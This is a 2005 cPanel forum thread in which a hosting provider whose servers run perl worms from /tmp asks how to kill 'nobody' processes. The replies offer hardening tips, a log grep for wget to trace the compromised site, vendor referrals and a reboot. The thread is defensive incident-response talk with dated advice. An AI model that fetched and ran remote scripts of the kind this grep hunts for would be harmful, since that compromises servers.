The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

how can i kill all process nobody?

Discussion in 'General Discussion' started by eLifeCP, Nov 13, 2005.

  1. eLifeCP

    eLifeCP Member
    PartnerNOC

    Joined:
    Feb 4, 2005
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    i have alot problem.i have 10 server i use trustix,redhat 9,redhat enterprise,centOS,fedora and freebsd.i think no OS can protect tmp.i found bot.txt worm.txt phpbb worm udb.pl.

    i find perl process in tmp alway.i want to how can i protect it and what command about kill all process nobody.

    i have suggest from ev1 but i don't know how can i do?i ask cpanel but cpanel suggest me i must be find customer run it.

    i try to search in this forum.i found this command for find customer have problem.

    grep "wget" /usr/local/apache/domlogs/*

    ev1 suggest me for this problem about udb.pl

    -------------------------------------------------------
    Our investigation found that your server was only exploited. No rootkits were installed. Nor was root access achieved. None of you local user accounts had started the attack sript either.

    Simply put, the hacker exploited the system, most likely via an apache/website script, achieved a terminal shell connection simular to ssh and telnet, then proceeded to launched an outbound attack.

    Some of the best ways to secure the server are: Have apache run under it's own user name (apache or httpd). Have the 'user' account for apache be unable to execute files located in /tmp and /var/tmp directories. Also have the user account 'nobody' should have these execution rights removed also. Nor should apache have access to execute any other applications beyond php/cgi/perl/ect to prevent future exploitation.

    Then you want to comb thru the httpd and other logs under /var/log/ and see if you can identify the means with which the hacker exploited the system to gain access. (IE did they use a buffer overflow exploit on apache? Or did they take advantage of some security hole on a website's perl/cgi/php/ect script ? Was the ftp service exploited? Once the security hole that they came in on has been identified, you can set out to secure the server so that it's not exploited once more via that hole.
    -------------------------------------------------------

    whoever can tell me how can i do?

    Thank you so much
    Best Regards
    eLife
     
  2. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    I suggest you protect and secure your servers. Running a couple of commands to kill some processes won't solve the issue. If you don't wish to hire a sys admin to secure your server(s), you need to search these forums. The security issue you're dealing with has been discusses many time. :)
     
  3. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA
    searching logs for wget will get you started on what site was used. find all the old phpBB installs and fix that ..mod_security helps some. But if you have no clue what this all means .. get an admin that does.
     
  4. WestBend

    WestBend Well-Known Member

    Joined:
    Oct 12, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    www.cplicensing.net.
    Download their check phpBB version script to look for bad phpBB's. Also check for Wordpress Versions less than 1.5.2.

    Pay chirpy to secure your servers !
    www.configservers.com
    He does a great job!
     
  5. eLifeCP

    eLifeCP Member
    PartnerNOC

    Joined:
    Feb 4, 2005
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    1
    Thank you so much i find phpBB old version but when i find nobody perl process.i have alot process.i need command about killall process nobody for kill it and fix later.Whoever help me for command.

    Thank you so much
     
  6. lloyd_tennison

    lloyd_tennison Well-Known Member

    Joined:
    Mar 12, 2004
    Messages:
    698
    Likes Received:
    1
    Trophy Points:
    18
    For someone who is NOT a server admin, you can kill all the processes (but it probably will not do much good as they might just start all over again with the exploit) by simply rebooting.

    No hard commands, no searching and killing processes, just reboot.

    (BTW - the command for that from ssh is "reboot" - without the qoutes. It may take 15 minutes before all services are restarted, so be aware of that.)
     
Loading...

Share This Page